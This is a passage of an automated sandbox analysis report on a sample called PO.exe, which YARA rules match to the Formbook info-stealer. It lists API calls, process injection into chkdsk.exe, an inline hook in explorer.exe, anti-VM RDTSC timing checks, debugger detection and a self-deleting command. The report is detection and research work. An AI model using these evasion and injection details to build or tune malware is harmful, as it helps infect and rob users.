          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B49E90 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B49E10 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B49F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B49DB3 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B49E8A NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B49F3B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00401027
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041E100
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041E246
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00409E40
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041DF12
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041DF1C
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009FB090
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00AA1002
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A04120
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009EF900
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A1EBB0
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009F841F
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A12581
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009FD5E0
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009E0D20
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00AB1D55
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A06E30
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_00401027
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_0041E100
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_0041E246
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B32D90
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B39E3C
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B39E40
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B32FB0
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4DF12
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4DF1C
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4E100
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4E246
          Source: C:\Users\user\Desktop\PO.exe Code function: String function: 009EB150 appears 35 times
          Source: PO.exe, 00000000.00000003.233217726.000000001F0EF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000002.282165146.0000000002656000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs PO.exe
          Source: PO.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@4/2
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
          Source: C:\Users\user\Desktop\PO.exe File created: C:\Users\user\AppData\Local\Temp\nsj9DD.tmp
          Source: PO.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\PO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: PO.exe Virustotal: Detection: 15%
          Source: PO.exe ReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\PO.exe File read: C:\Users\user\Desktop\PO.exe
          Source: unknown Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exe Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: C:\xampp\htdocs\Cryptor\a3aea962689945e0b965ec319b5ccdaa\Loader\Loader\Release\16znhx5gg.pdb source: PO.exe, 00000000.00000002.240861204.0000000073CA2000.00000002.00020000.sdmp, gif000d.dll.0.dr
          Source: Binary string: chkdsk.pdbGCTL source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: chkdsk.pdb source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.232569339.000000001EFD0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\PO.exe Unpacked PE file: 1.2.PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041E34F push eax; ret
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00417CCE push 7FCF5E29h; iretd
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00417CD7 push ebx; retf
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004164B4 push esi; ret
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00417D58 push esp; iretd
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A3D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_0041E34F push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B464B4 push esi; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B47CD7 push ebx; retf
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B47CCE push 7FCF5E29h; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B47D58 push esp; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4CF02 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4CF0B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4CF6C push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B4E34F push eax; ret
          Source: C:\Users\user\Desktop\PO.exe File created: C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEF
          Source: C:\Users\user\Desktop\PO.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PO.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000004B398E4 second address: 0000000004B398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000004B39B5E second address: 0000000004B39B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 3868 Thread sleep count: 33 > 30
          Source: C:\Windows\explorer.exe TID: 3868 Thread sleep time: -66000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4740 Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.260637571.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.242011402.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.242372336.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.239700502.000000000113D000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000002.00000000.239807518.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.262044821.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000002.508445429.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.262044821.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_0255165D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_02551875 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A1F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A7B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00AB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00AA2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00AB1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A0C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A1A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A12990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A04120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_009EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
